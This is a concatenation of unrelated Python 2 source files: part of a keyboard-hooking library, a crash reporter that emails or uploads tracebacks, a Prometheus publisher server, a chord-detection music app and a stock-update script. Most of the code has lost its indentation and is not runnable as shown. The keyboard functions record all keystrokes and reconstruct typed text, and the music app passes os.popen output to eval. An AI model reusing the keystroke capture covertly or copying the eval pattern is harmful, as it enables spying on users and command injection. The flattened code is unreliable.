release(scan_code)
for modifier in modifiers:
press(modifier)
_os_keyboard.press(scan_code)
_os_keyboard.release(scan_code)
for modifier in modifiers:
release(modifier)
except ValueError:
_os_keyboard.type_unicode(letter)
if delay:
_time.sleep(delay)
if restore_state_after:
restore_state(state)
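# Illustrative usage sketch (not part of the original module): typing text
# with a per-character delay, and forcing explicit unicode events. Never
# invoked at import time.
def _example_write():
    write('Hello, world!', delay=0.01)
    write(u'h\xe9llo', exact=True)  # typed as explicit unicode code points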
def to_scan_code(key):
"""
Returns the scan code for a given key name (or scan code, i.e. do nothing).
Note that a name may belong to more than one physical key, in which case
one of the scan codes will be chosen.
"""
if is_number(key):
return key
else:
scan_code, modifiers = _os_keyboard.map_char(_normalize_name(key))
return scan_code
def send(combination, do_press=True, do_release=True):
"""
Sends OS events that perform the given hotkey combination.
- `combination` can be either a scan code (e.g. 57 for space), single key
(e.g. 'space') or multi-key, multi-step combination (e.g. 'alt+F4, enter').
- `do_press` if true then press events are sent. Defaults to True.
- `do_release` if true then release events are sent. Defaults to True.
send(57)
send('ctrl+alt+del')
send('alt+F4, enter')
send('shift+s')
Note: keys are released in the opposite order they were pressed.
"""
for keys in canonicalize(combination):
if do_press:
for key in keys:
_os_keyboard.press(to_scan_code(key))
if do_release:
for key in reversed(keys):
_os_keyboard.release(to_scan_code(key))
def press(combination):
""" Presses and holds down a key combination (see `send`). """
send(combination, True, False)
def release(combination):
""" Releases a key combination (see `send`). """
send(combination, False, True)
def press_and_release(combination):
""" Presses and releases the key combination (see `send`). """
send(combination, True, True)
def _make_wait_and_unlock():
"""
    Works around CPython's inability to interrupt a blocking lock acquisition
    with signals by polling `Queue.get` with a timeout. Without this Ctrl+C
    doesn't close the program.
"""
q = queue.Queue(maxsize=1)
def wait():
while True:
try:
return q.get(timeout=1)
except queue.Empty:
pass
return (wait, lambda v=None: q.put(v))
def wait(combination=None):
"""
Blocks the program execution until the given key combination is pressed or,
if given no parameters, blocks forever.
"""
wait, unlock = _make_wait_and_unlock()
if combination is not None:
hotkey_handler = add_hotkey(combination, unlock)
wait()
remove_hotkey(hotkey_handler)
def read_key(filter=lambda e: True):
"""
Blocks until a keyboard event happens, then returns that event.
"""
wait, unlock = _make_wait_and_unlock()
def test(event):
if filter(event):
unhook(test)
unlock(event)
hook(test)
return wait()
def record(until='escape'):
"""
Records all keyboard events from all keyboards until the user presses the
given key combination. Then returns the list of events recorded, of type
`keyboard.KeyboardEvent`. Pairs well with
`play(events)`.
Note: this is a blocking function.
Note: for more details on the keyboard hook and events see `hook`.
"""
recorded = []
hook(recorded.append)
wait(until)
unhook(recorded.append)
return recorded
def play(events, speed_factor=1.0):
"""
Plays a sequence of recorded events, maintaining the relative time
intervals. If speed_factor is <= 0 then the actions are replayed as fast
as the OS allows. Pairs well with `record()`.
Note: the current keyboard state is cleared at the beginning and restored at
the end of the function.
"""
state = stash_state()
last_time = None
for event in events:
if speed_factor > 0 and last_time is not None:
_time.sleep((event.time - last_time) / speed_factor)
last_time = event.time
key = event.scan_code or event.name
if event.event_type == KEY_DOWN:
press(key)
elif event.event_type == KEY_UP:
release(key)
# Ignore other types of events.
restore_state(state)
replay = play
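# Illustrative usage sketch (not part of the original module): record a macro
# until escape is pressed, then replay it at double speed. Never invoked at
# import time.
def _example_record_play():
    events = record(until='escape')
    play(events, speed_factor=2.0)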
_shifted_mapping = {'1': '!', '2': '@', '3': '#', '4': '$', '5': '%', '6': '¨',
'7': '&', '8': '*', '9': '(', '0': ')', '-': '_', '=': '+', '\'': '"',
'[': '{', ']': '}', '´': '`', '~': '^', '\\': '|', ',': '<', '.': '>',
';': ':', '/': '?'}
def _get_shifted_character(character):
"""
    Maps special characters to their shifted counterparts so that
    `get_typed_strings` reports the correct character while shift is pressed.
"""
return _shifted_mapping.get(character, character.upper())
def get_typed_strings(events, allow_backspace=True):
"""
Given a sequence of events, tries to deduce what strings were typed.
Strings are separated when a non-textual key is pressed (such as tab or
enter). Characters are converted to uppercase according to shift and
capslock status. If `allow_backspace` is True, backspaces remove the last
character typed.
This function is a generator, so you can pass an infinite stream of events
and convert them to strings in real time.
    Note this function is merely a heuristic. Windows, for example, keeps per-
    process keyboard state such as keyboard layout, and this information is not
    available for our hooks.
    get_typed_strings(record()) -> ['This is what', 'I recorded', '']
"""
shift_pressed = False
capslock_pressed = False
string = ''
for event in events:
name = event.name
# Space is the only key that we canonicalize to the spelled out name
# because of legibility. Now we have to undo that.
if matches(event, 'space'):
name = ' '
if matches(event, 'shift'):
shift_pressed = event.event_type == 'down'
elif matches(event, 'caps lock') and event.event_type == 'down':
capslock_pressed = not capslock_pressed
elif allow_backspace and matches(event, 'backspace') and event.event_type == 'down':
string = string[:-1]
elif event.event_type == 'down':
if len(name) == 1:
if shift_pressed:
name = _get_shifted_character(name)
elif capslock_pressed:
name = name.upper()
string = string + name
else:
yield string
string = ''
yield string
_key_table = _KeyTable(press, release)
recording = None
def start_recording(recorded_events_queue=None):
"""
Starts recording all keyboard events into a global variable, or the given
queue if any. Returns the queue of events and the hooked function.
Use `stop_recording()` or `unhook(hooked_function)` to stop.
"""
global recording
recorded_events_queue = recorded_events_queue or queue.Queue()
recording = recorded_events_queue, hook(recorded_events_queue.put)
return recording
def stop_recording():
"""
Stops the global recording of events and returns a list of the events
captured.
"""
global recording
if not recording:
raise ValueError('Must call "start_recording" before.')
recorded_events_queue, hooked = recording
unhook(hooked)
recording = None
return list(recorded_events_queue.queue)
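# Illustrative usage sketch (not part of the original module): the global
# recording variant of `record`. Never invoked at import time.
def _example_global_recording():
    start_recording()
    _time.sleep(5)  # capture events for five seconds
    events = stop_recording()
    print('captured %d events' % len(events))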
def get_shortcut_name(names=None):
"""
    Returns a string representation of the shortcut from the given key names, or
the currently pressed keys if not given. This function:
- normalizes names;
- removes "left" and "right" prefixes;
- replaces the "+" key name with "plus" to avoid ambiguity;
- puts modifier keys first, in a standardized order;
    - sorts remaining keys;
- finally, joins everything with "+".
Example:
get_shortcut_name(['+', 'left ctrl', 'shift'])
# "ctrl+shift+plus"
"""
if names is None:
_listener.start_if_necessary()
names = [e.name for e in _pressed_events.values()]
else:
names = [_normalize_name(name) for name in names]
clean_names = set(e.replace('left ', '').replace('right ', '').replace('+', 'plus') for e in names)
# https://developer.apple.com/macos/human-interface-guidelines/input-and-output/keyboard/
# > List modifier keys in the correct order. If you use more than one modifier key in a
# > shortcut, always list them in this order: Control, Option, Shift, Command.
modifiers = ['ctrl', 'alt', 'shift', 'windows']
sorting_key = lambda k: (modifiers.index(k) if k in modifiers else 5, str(k))
return '+'.join(sorted(clean_names, key=sorting_key))
def read_shortcut():
"""
Similar to `read_key()`, but blocks until the user presses and releases a key
combination (or single key), then returns a string representing the shortcut
pressed.
Example:
read_shortcut()
# "ctrl+shift+p"
"""
wait, unlock = _make_wait_and_unlock()
def test(event):
if event.event_type == KEY_UP:
unhook(test)
names = [e.name for e in _pressed_events.values()] + [event.name]
unlock(get_shortcut_name(names))
hook(test)
return wait()
read_hotkey = read_shortcut
def remap(src, dst):
"""
Whenever the key combination `src` is pressed, suppress it and press
`dst` instead.
Example:
remap('alt+w', 'up')
remap('capslock', 'esc')
"""
def handler():
state = stash_state()
press_and_release(dst)
restore_state(state)
return add_hotkey(src, handler, suppress=True)
|
crashreporter.py
|
__author__ = 'calvin'
import ConfigParser
import datetime
import glob
import json
import logging
import os
import re
import shutil
import smtplib
import sys
import time
from email import encoders
from email.mime.base import MIMEBase
from email.mime.multipart import MIMEMultipart
from email.mime.text import MIMEText
from threading import Thread
import jinja2
from api import upload_report, upload_many_reports, HQ_DEFAULT_TIMEOUT, SMTP_DEFAULT_TIMEOUT
from process import CrashReportingProcess
from tools import analyze_traceback, repr as safe_repr
class CrashReporter(object):
"""
Create a context manager that emails or uploads a report to a webserver (HQ) with the traceback on a crash.
    It can be set up to do both, or just one of the upload methods.
If a crash report fails to upload, the report is saved locally to the `report_dir` directory. The next time the
CrashReporter starts up, it will attempt to upload all offline reports every `check_interval` seconds. After a
successful upload the offline reports are deleted. A maximum of `offline_report_limit` reports are saved at any
time. Reports are named crashreport01, crashreport02, crashreport03 and so on. The most recent report is always
crashreport01.
Report Customizing Attributes:
application_name: Application name as a string to be included in the report
application_version: Application version as a string to be included in the report
user_identifier: User identifier as a string to add to the report
offline_report_limit: Maximum number of offline reports to save.
    recursion_depth_limit: Maximum number of tracebacks to record in the case of RuntimeError: maximum recursion depth
                           exceeded
max_string_length: Maximum string length for values returned in variable inspection. This prevents reports which
contain array data from becoming too large.
inspection_level: The number of traceback objects (from most recent) to inspect for source code, local variables etc
:param report_dir: Directory to save offline reports.
:param watcher: Enable a thread that periodically checks for any stored offline reports and attempts to send them.
:param check_interval: How often the watcher will attempt to send offline reports.
:param logger: Optional logger to use.
:param config: Path to configuration file that defines the arguments to setup_smtp and setup_hq. The file has the
format of a ConfigParser file with sections [SMTP] and [HQ]
"""
_report_name = "crash_report_%d"
html_template = os.path.join(os.path.dirname(os.path.realpath(__file__)), 'email_report.html')
active = False
application_name = None
application_version = None
user_identifier = None
offline_report_limit = 10
recursion_depth_limit = 10
send_at_most = 3 # max number of offline reports to send in batch
max_string_length = 1000
    obj_ref_regex = re.compile("[A-Za-z]+[0-9]*\.(?:[A-Za-z]+[0-9]*\.?)+(?!\')")
def __init__(self, report_dir=None, config='', logger=None, activate=True,
watcher=True, check_interval=5*60):
self.logger = logger if logger else logging.getLogger('CrashReporter')
# Setup the directory used to store offline crash reports
self.report_dir = report_dir
self.check_interval = check_interval
self.watcher_enabled = watcher
self._watcher = None
self._watcher_running = False
self.etype = None
self.evalue = None
self.tb = None
self._recursion_error = False
self.analyzed_traceback = None
self.payload = None
self._excepthook = None
self.inspection_level = 1
self._smtp = None
self._hq = None
# Load the configuration from a file if specified
if os.path.isfile(config):
self.load_configuration(config)
if activate:
self.enable()
def setup_smtp(self, host, port, user, passwd, recipients, **kwargs):
"""
Set up the crash reporter to send reports via email using SMTP
:param host: SMTP host
:param port: SMTP port
:param user: sender email address
:param passwd: sender email password
:param recipients: list or comma separated string of recipients
"""
self._smtp = kwargs
self._smtp.update({'host': host, 'port': port, 'user': user, 'passwd': passwd, 'recipients': recipients})
try:
self._smtp['timeout'] = int(kwargs.get('timeout', SMTP_DEFAULT_TIMEOUT))
except Exception as e:
logging.error(e)
self._smtp['timeout'] = None
self._smtp['from'] = kwargs.get('from', user)
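    # Illustrative sketch (hypothetical values, not part of the original
    # class): how an instance would typically be wired up for email submission.
    #   reporter = CrashReporter(report_dir='/tmp/reports', activate=False)
    #   reporter.setup_smtp(host='smtp.example.com', port=587,
    #                       user='sender@example.com', passwd='secret',
    #                       recipients=['dev@example.com'])
    #   reporter.enable()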
def setup_hq(self, server, **kwargs):
self._hq = kwargs
try:
self._hq['timeout'] = int(kwargs.get('timeout', HQ_DEFAULT_TIMEOUT))
except Exception as e:
logging.error(e)
self._hq['timeout'] = None
self._hq.update({'server': server})
def enable(self):
"""
        Enable the crash reporter. The CrashReporter is enabled by default on creation.
"""
if not CrashReporter.active:
CrashReporter.active = True
# Store this function so we can set it back if the CrashReporter is deactivated
self._excepthook = sys.excepthook
sys.excepthook = self.exception_handler
self.logger.info('CrashReporter: Enabled')
if self.report_dir:
if os.path.exists(self.report_dir):
if self.get_offline_reports():
# First attempt to send the reports, if that fails then start the watcher
self.submit_offline_reports()
remaining_reports = len(self.get_offline_reports())
if remaining_reports and self.watcher_enabled:
self.start_watcher()
else:
os.makedirs(self.report_dir)
def disable(self):
"""
Disable the crash reporter. No reports will be sent or saved.
"""
if CrashReporter.active:
CrashReporter.active = False
# Restore the original excepthook
sys.excepthook = self._excepthook
self.stop_watcher()
self.logger.info('CrashReporter: Disabled')
def start_watcher(self):
"""
Start the watcher that periodically checks for offline reports and attempts to upload them.
"""
        if self._watcher and self._watcher.is_alive():
self._watcher_running = True
else:
self.logger.info('CrashReporter: Starting watcher.')
self._watcher = Thread(target=self._watcher_thread, name='offline_reporter')
self._watcher.setDaemon(True)
self._watcher_running = True
self._watcher.start()
def stop_watcher(self):
"""
Stop the watcher thread that tries to send offline reports.
"""
if self._watcher:
self._watcher_running = False
self.logger.info('CrashReporter: Stopping watcher.')
def interprocess_exception_handler(self, err_name, err_msg, analyzed_tb):
payload = self.generate_payload(err_name, err_msg, analyzed_tb)
self.handle_payload(payload)
def _analyze_traceback(self, traceback):
        # To prevent recording a large amount of potentially redundant tracebacks, limit the traceback in the case of
        # infinite recursion errors.
limit = CrashReporter.recursion_depth_limit if self._recursion_error else None
analyzed_tb = analyze_traceback(traceback, limit=limit)
self.custom_inspection(analyzed_tb)
# Perform serialization check on the possibly user-altered traceback
        overridden = self.__class__.custom_inspection.im_func is not CrashReporter.custom_inspection.im_func
        if overridden:
for tb in analyzed_tb:
for key, value in tb['Custom Inspection'].iteritems():
try:
json.dumps(value)
except TypeError:
tb['Custom Inspection'][key] = {k: safe_repr(v) for k, v in value.iteritems()}
return analyzed_tb
def custom_inspection(self, analyzed_traceback):
"""
Define this function so that users can override it and add their own custom information to
the payload in the 'Custom Inspection' key.
"""
return analyzed_traceback
def exception_handler(self, etype, evalue, tb):
"""
        Exception hook. Catches crashes / uncaught exceptions and passes them to handle_payload()
:param etype: Exception type
:param evalue: Exception value
:param tb: Traceback
:return:
"""
self.etype = etype
self.evalue = evalue
self.tb = tb
self._recursion_error = "maximum recursion depth exceeded" in str(self.evalue)
if etype:
self.logger.info('CrashReporter: Crashes detected!')
self.analyzed_traceback = self._analyze_traceback(tb)
self.handle_payload(self.generate_payload(etype.__name__, '%s' % evalue, self.analyzed_traceback))
else:
self.logger.info('CrashReporter: No crashes detected.')
self.forward_exception(etype, evalue, tb)
def forward_exception(self, etype, evalue, tb):
"""
        Forward the exception to the backup copy of the original sys.excepthook.
        :param etype: Exception type
:param evalue: Exception value
:param tb: Traceback
:return:
"""
self._excepthook(etype, evalue, tb)
def handle_payload(self, payload):
"""
        Given a crash report (JSON-serializable payload), attempts to upload it. Calls the default
        exception handler (sys.__excepthook__) upon completion.
:param payload: JSON structure containing crash report along with metadata
:return:
"""
self.payload = payload
if CrashReporter.active:
# Attempt to upload the report
hq_success = smtp_success = False
if self._hq is not None:
hq_success = self.hq_submit(self.payload)
if hq_success:
self.payload['HQ Submission'] = 'Sent'
if self._smtp is not None:
# Send the report via email
smtp_success = self.smtp_submit(self.subject(), self.body(self.payload), self.attachments())
if smtp_success:
self.payload['SMTP Submission'] = 'Sent'
if not CrashReporter.active or (self._smtp and not smtp_success) or (self._hq and not hq_success):
# Only store the offline report if any of the upload methods fail, or if the Crash Reporter was disabled
report_path = self.store_report(self.payload)
self.logger.info('Offline Report stored %s' % report_path)
def generate_payload(self, err_name, err_msg, analyzed_tb):
dt = datetime.datetime.now()
payload = {'Error Type': err_name,
'Error Message': err_msg + self._recursion_error * " (Not all tracebacks are shown)",
'Application Name': self.application_name,
'Application Version': self.application_version,
'User': self.user_identifier,
'Date': dt.strftime('%d %B %Y'),
'Time': dt.strftime('%I:%M %p'),
'Traceback': analyzed_tb,
'HQ Submission': 'Not sent' if self._hq else 'Disabled',
'SMTP Submission': 'Not sent' if self._smtp else 'Disabled'
}
return payload
def load_configuration(self, config):
cfg = ConfigParser.ConfigParser()
with open(config, 'r') as _f:
cfg.readfp(_f)
if cfg.has_section('General'):
general = dict(cfg.items('General'))
self.application_name = general.get('application_name', CrashReporter.application_name)
self.application_version = general.get('application_version', CrashReporter.application_version)
self.user_identifier = general.get('user_identifier', CrashReporter.user_identifier)
self.offline_report_limit = general.get('offline_report_limit', CrashReporter.offline_report_limit)
self.max_string_length = general.get('max_string_length', CrashReporter.max_string_length)
if cfg.has_section('SMTP'):
self.setup_smtp(**dict(cfg.items('SMTP')))
if 'port' in self._smtp:
self._smtp['port'] = int(self._smtp['port'])
if 'recipients' in self._smtp:
self._smtp['recipients'] = self._smtp['recipients'].split(',')
if cfg.has_section('HQ'):
self.setup_hq(**dict(cfg.items('HQ')))
def subject(self):
"""
Return a string to be used as the email subject line.
"""
if self.application_name and self.application_version:
return 'Crash Report - {name} (v{version})'.format(name=self.application_name,
version=self.application_version)
else:
return 'Crash Report'
def body(self, payload):
return self.render_report(payload, inspection_level=self.inspection_level)
def render_report(self, payload, inspection_level=1):
with open(self.html_template, 'r') as _f:
template = jinja2.Template(_f.read())
return template.render(info=payload,
inspection_level=inspection_level)
def attachments(self):
"""
Generate and return a list of attachments to send with the report.
:return: List of strings containing the paths to the files.
"""
return []
def delete_offline_reports(self):
"""
        Delete stored offline reports that were successfully sent or whose upload method is disabled.
        :return: List of reports that still require submission
"""
reports = self.get_offline_reports()
remaining_reports = reports[:]
for report in reports:
with open(report, 'r') as _f:
try:
js = json.load(_f)
except ValueError as e:
logging.error("%s. Deleting crash report.")
os.remove(report)
continue
if js['SMTP Submission'] in ('Sent', 'Disabled') and js['HQ Submission'] in ('Sent', 'Disabled'):
                # Only delete the reports which have been sent or whose upload method is disabled.
remaining_reports.remove(report)
try:
os.remove(report)
except OSError as e:
logging.error(e)
self.logger.info('CrashReporter: Deleting offline reports. %d reports remaining.' % len(remaining_reports))
return remaining_reports
def submit_offline_reports(self):
"""
Submit offline reports using the enabled methods (SMTP and/or HQ)
        Returns True if every attempted report was submitted successfully.
"""
smtp_enabled = bool(self._smtp)
hq_enabled = bool(self._hq)
offline_reports = self.get_offline_reports()
logging.info('Submitting %d offline crash reports' % len(offline_reports))
offline_reports = offline_reports[:self.send_at_most]
if smtp_enabled:
try:
smtp_success = self._smtp_send_offline_reports(*offline_reports)
except Exception as e:
logging.error(e)
smtp_success = [False] * len(offline_reports)
else:
smtp_success = [True] * len(offline_reports)
if hq_enabled:
try:
hq_success = self._hq_send_offline_reports(*offline_reports)
except Exception as e:
logging.error(e)
hq_success = [False] * len(offline_reports)
else:
hq_success = [True] * len(offline_reports)
remaining_reports = self.delete_offline_reports()
success = [s1 and s2 for (s1, s2) in zip(smtp_success, hq_success)]
logging.info('%d crash reports successfully submitted' % success.count(True))
logging.info('%d crash reports remain to be submitted' % len(remaining_reports))
return all(success)
def store_report(self, payload):
"""
        Save the crash report to a file, keeping the last `offline_report_limit` files in a cyclical FIFO buffer.
        The newest crash report is always named 01.
"""
offline_reports = self.get_offline_reports()
if offline_reports:
# Increment the name of all existing reports 1 --> 2, 2 --> 3 etc.
for ii, report in enumerate(reversed(offline_reports)):
rpath, ext = os.path.splitext(report)
n = int(re.findall('(\d+)', rpath)[-1])
new_name = os.path.join(self.report_dir, self._report_name % (n + 1)) + ext
shutil.copy2(report, new_name)
os.remove(report)
# Delete the oldest report
if len(offline_reports) >= self.offline_report_limit:
oldest = glob.glob(os.path.join(self.report_dir, self._report_name % (self.offline_report_limit+1) + '*'))[0]
os.remove(oldest)
new_report_path = os.path.join(self.report_dir, self._report_name % 1 + '.json')
# Write a new report
with open(new_report_path, 'w') as _f:
json.dump(payload, _f)
return new_report_path
def hq_submit(self, payload):
payload['HQ Parameters'] = self._hq if self._hq is not None else {}
r = upload_report(self._hq['server'], payload, timeout=self._hq['timeout'])
if r is False:
return False
else:
return r.status_code == 200
def smtp_submit(self, subject, body, attachments=None):
smtp = self._smtp
msg = MIMEMultipart()
        if isinstance(smtp['recipients'], (list, tuple)):
msg['To'] = ', '.join(smtp['recipients'])
else:
msg['To'] = smtp['recipients']
msg['From'] = smtp['from']
msg['Subject'] = subject
# Add the body of the message
msg.attach(MIMEText(body, 'html'))
# Add any attachments
if attachments:
for attachment in attachments:
part = MIMEBase('application', 'octet-stream')
                part.set_payload(open(attachment, 'rb').read())
encoders.encode_base64(part)
part.add_header('Content-Disposition',
'attachment; filename="%s"' % os.path.basename(attachment))
msg.attach(part)
try:
ms = smtplib.SMTP(smtp['host'], smtp['port'], timeout=smtp['timeout'])
ms.ehlo()
ms.starttls()
ms.ehlo()
ms.login(smtp['user'], smtp['passwd'])
ms.sendmail(smtp['from'], smtp['recipients'], msg.as_string())
ms.close()
except Exception as e:
self.logger.error('CrashReporter: %s' % e)
return False
return True
def get_offline_reports(self):
return sorted(glob.glob(os.path.join(self.report_dir, self._report_name.replace("%d", "*"))))
def poll(self):
for remote, local in CrashReportingProcess.cr_pipes:
if remote.poll():
pkg = remote.recv()
self.logger.debug('Interprocess payload found.')
self.handle_payload(self.generate_payload(*pkg))
return True
return False
def _watcher_thread(self):
"""
Periodically attempt to upload the crash reports. If any upload method is successful, delete the saved reports.
"""
while 1:
time.sleep(self.check_interval)
if not self._watcher_running:
break
self.logger.info('CrashReporter: Attempting to send offline reports.')
self.submit_offline_reports()
remaining_reports = len(self.get_offline_reports())
if remaining_reports == 0:
break
self._watcher = None
self.logger.info('CrashReporter: Watcher stopped.')
def _smtp_send_offline_reports(self, *offline_reports):
success = []
if offline_reports:
            # Try to submit each stored report that has not yet been sent via SMTP
for report in offline_reports:
with open(report, 'r') as js:
payload = json.load(js)
if payload['SMTP Submission'] == 'Not sent':
success.append(self.smtp_submit(self.subject(), self.body(payload)))
if success[-1]:
# Set the flag in the payload signifying that the SMTP submission was successful
payload['SMTP Submission'] = 'Sent'
with open(report, 'w') as js:
json.dump(payload, js)
self.logger.info('CrashReporter: %d Offline reports sent.' % sum(success))
return success
def _hq_send_offline_reports(self, *offline_reports):
payloads = {}
if offline_reports:
for report in offline_reports:
with open(report, 'r') as _f:
payload = json.load(_f)
if payload['HQ Submission'] == 'Not sent':
payload['HQ Parameters'] = self._hq if self._hq is not None else {}
payloads[report] = payload
if payloads:
r = upload_many_reports(self._hq['server'], payloads.values(), timeout=self._hq['timeout'])
if r is False or r.status_code != 200:
return [False] * len(payloads)
# Set the flag in the payload signifying that the HQ submission was successful
for report, payload in payloads.iteritems():
payload['HQ Submission'] = 'Sent'
with open(report, 'w') as js:
json.dump(payload, js)
return [True] * len(payloads)
else:
return [False] * len(payloads)
|
publisher_server.py
|
import json
import sys
import traceback
from BaseHTTPServer import HTTPServer, BaseHTTPRequestHandler
from SocketServer import ThreadingMixIn
import threading
from Queue import Queue
from oslo_config import cfg
from ceilometer import service
from ceilometer_fiprom.fiprom_storage import PrometheusStorage
from ceilometer.openstack.common import log
LOG = log.getLogger(__name__)
OPTS = [
    cfg.IntOpt('server_port',
               help='port where the fiprom server will be listening')
]
cfg.CONF.register_opts(OPTS, group="fiprom")
# thread-safe queue holding requests to process
q = Queue(maxsize=0)
def process_request():
publisher = PrometheusStorage("")
while True:
data = q.get()
try:
LOG.debug('Processing request (%s left in the queue)', q.qsize())
publisher.record_metering_data(data)
except:
traceback.print_exc(file=sys.stdout)
q.task_done()
class Handler(BaseHTTPRequestHandler):
def _set_headers(self):
self.send_response(200)
self.send_header('Content-type', 'text/html')
self.end_headers()
def do_POST(self):
data = self.rfile.read(int(self.headers['Content-Length']))
self._set_headers()
jdata = json.loads(data)
q.put(jdata)
LOG.debug('Adding request (%s already in the queue) [n.threads=%s]', q.qsize(), threading.activeCount())
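# Illustrative request sketch (hypothetical payload; the handler ignores the
# request path and queues the JSON body as-is):
#   curl -X POST -H 'Content-Type: application/json' \
#        -d '{"counter_name": "cpu_util"}' http://localhost:<server_port>/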
class ThreadedHTTPServer(ThreadingMixIn, HTTPServer):
"""Handle requests in a separate thread."""
if __name__ == '__main__':
# load configuration
service.prepare_service()
    # set up a worker thread that reads from the queue
worker = threading.Thread(target=process_request)
worker.setDaemon(True)
worker.start()
    # set up the HTTP server
port = cfg.CONF.fiprom.server_port
server = ThreadedHTTPServer(('0.0.0.0', port), Handler)
server.serve_forever()
|
main.py
|
# Joey Alexander
# Built by Gautam Mittal (2017)
# Real-time chord detection and improvisation software that uses Fast Fourier Transforms, DSP, and machine learning
import sys
sys.path.append('util')
from PyQt4 import QtGui, QtCore
from matplotlib.backends.backend_qt4agg import FigureCanvasQTAgg as FigureCanvas
from matplotlib.backends.backend_qt4agg import NavigationToolbar2QT as NavigationToolbar
from music21 import *
import os, threading, subprocess, numpy as np, atexit, pyaudio, matplotlib.pyplot as plt, chords, peakutils, player
# Set up chord detection variables
global CURRENT_CHORD, CURRENT_SCALE, detection_started
chordFinder = chords.ChordDetector()
chordQualities = chords.qualities
chordRoots = chords.noteNames
# Set up synthesized instrument
instrument = player.Player()
instrument.setBPM(240)
def run():
global CURRENT_SCALE
while True:
instrument.play(CURRENT_SCALE["scale"])
# Given a chord symbol, return a list of the 1, 3, 5, 7 scale degrees ("chord tones")
def chordTones(chordSymbol):
return eval(os.popen('./util/chordScale "'+chordSymbol+'"').read())
# Given a chord, find an appropriate scale to use for improvisation
def improvisationScale(chord, symbol):
# Decide on scale type based on common chord-scale conventions
scaleType = scale.DorianScale()
if chord.quality == 1:
scaleType = scale.MajorScale()
elif chord.quality == 3:
scaleType = scale.MixolydianScale()
tones = map(lambda x: x.replace('b', '-'), chordTones(symbol))
scales = scaleType.derive(tones) # Find the scale based on the given tones
    allPitches = scales.getPitches() # Get the associated scale degrees
allNoteNames = [i.name for i in allPitches] # Turn them into real note names
return {'name': scales.name, 'scale': allNoteNames}
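# Illustrative sketch (hypothetical output shape; the actual note names depend
# on the detected chord and on music21's scale derivation):
#   improvisationScale(chordFinder, 'C7')
#   -> {'name': '<derived scale name>', 'scale': ['C', 'D', 'E', ...]}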
# Record audio in real-time for chord detection
class MicrophoneRecorder(object):
def __init__(self, rate=2000, chunksize=2**12):
self.rate = rate
self.chunksize = chunksize
self.p = pyaudio.PyAudio()
self.stream = self.p.open(format=pyaudio.paInt16,
channels=1,
rate=self.rate,
input=True,
frames_per_buffer=self.chunksize,
stream_callback=self.new_frame)
self.lock = threading.Lock()
self.stop = False
self.frames = []
atexit.register(self.close)
def new_frame(self, data, frame_count, time_info, status):
data = np.fromstring(data, 'int16')
with self.lock:
self.frames.append(data)
if self.stop:
return None, pyaudio.paComplete
return None, pyaudio.paContinue
def get_frames(self):
with self.lock:
frames = self.frames
self.frames = []
return frames
def start(self):
self.stream.start_stream()
def close(self):
with self.lock:
self.stop = True
self.stream.close()
self.p.terminate()
class MplFigure(object):
def __init__(self, parent):
self.figure = plt.figure(facecolor='white')
self.canvas = FigureCanvas(self.figure)
class LiveFFTWidget(QtGui.QWidget):
def __init__(self):
QtGui.QWidget.__init__(self)
self.initUI()
self.initData()
self.initMplWidget()
def initUI(self):
vbox = QtGui.QVBoxLayout()
self.main_figure = MplFigure(self)
vbox.addWidget(self.main_figure.canvas)
self.setLayout(vbox)
self.setGeometry(300, 300, 350, 300)
self.setWindowTitle('Joey Alexander')
self.show()
timer = QtCore.QTimer()
timer.timeout.connect(self.handleNewData)
timer.start(50)
self.timer = timer
def initData(self):
mic = MicrophoneRecorder()
mic.start()
self.mic = mic
self.freq_vect = np.fft.rfftfreq(mic.chunksize,
1./mic.rate)
self.time_vect = np.arange(mic.chunksize, dtype=np.float32) / mic.rate * 1000
def initMplWidget(self):
self.ax_top = self.main_figure.figure.add_subplot(211)
self.ax_top.set_ylim(-32768, 32768)
self.ax_top.set_xlim(0, self.time_vect.max())
self.ax_top.set_xlabel(u'time (ms)', fontsize=6)
self.ax_bottom = self.main_figure.figure.add_subplot(212)
self.ax_bottom.set_ylim(0, 1)
self.ax_bottom.set_xlim(0, self.freq_vect.max())
self.ax_bottom.set_xlabel(u'frequency (Hz)', fontsize=6)
self.line_top, = self.ax_top.plot(self.time_vect,
np.ones_like(self.time_vect))
self.line_bottom, = self.ax_bottom.plot(self.freq_vect,
np.ones_like(self.freq_vect))
    # handles the asynchronously collected sound chunks
def handleNewData(self):
global detection_started, CURRENT_SCALE, CURRENT_CHORD
frames = self.mic.get_frames()
if len(frames) > 0:
current_frame = frames[-1]
# get 12x1 chroma vector with respective energies for each note
chroma = chords.calculateChromagram(self.freq_vect, np.abs(np.fft.rfft(current_frame)))
chordFinder.detectChord(chroma)
chordString = ""
if chordFinder.intervals > 0:
chordString = str(chordRoots[chordFinder.rootNote]) + str(chordQualities[chordFinder.quality]) + str(chordFinder.intervals)
else:
chordString = str(chordRoots[chordFinder.rootNote]) + str(chordQualities[chordFinder.quality])
CURRENT_SCALE = improvisationScale(chordFinder, chordString)
CURRENT_CHORD = {
'chord': chordString,
'root': chordRoots[chordFinder.rootNote],
'quality': chordQualities[chordFinder.quality],
'interval': chordFinder.intervals
}
print CURRENT_CHORD
            if not detection_started:
                detection_started = True
                threading.Thread(target=run).start()
# plots the time signal
self.line_top.set_data(self.time_vect, current_frame)
fft_frame = np.fft.rfft(current_frame)
fft_frame /= np.abs(fft_frame).max()
self.line_bottom.set_data(self.freq_vect, np.abs(fft_frame))
self.main_figure.canvas.draw()
if __name__ == "__main__":
detection_started = False
app = QtGui.QApplication(sys.argv)
window = LiveFFTWidget()
sys.exit(app.exec_())
|
update_stock_trade.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
import multiprocessing
import os
import sys
import time
import traceback
from webapp.models.req_error_log import ReqErrorLog
sys.path.insert(0, os.path.dirname(os.path.dirname(__file__)))
from webapp import app, db, config_app
from webapp.services import db_service as dbs,data_service as dts
reload(sys)
sys.setdefaultencoding('utf8')
import threading
config_app(app, 'scriptfan.cfg')
ctx = app.app_context()
g_queue = multiprocessing.Queue()
def update_stock(t):
ctx.push()
while not g_queue.empty():
time.sleep(5)
item = g_queue.get()
try:
dts.updateTradeData(item)
except Exception, ex:
app.logger.warn('stock %s update fail' % item)
msg = traceback.format_exc()
eLog = ReqErrorLog("trade_update", item, msg[:1800])
db.session.add(eLog)
db.session.commit()
continue
def main():
ctx.push()
# datas = ['000002']
datas = dbs.get_refresh_trade_stocks()
for code in datas:
g_queue.put(code)
thread_list = [threading.Thread(target=update_stock, args=(i,)) for i in range(5)]
for t in thread_list:
t.start()
for t in thread_list:
if t.is_alive():
t.join()
if __name__ == '__main__':
main()
|
website.py
|
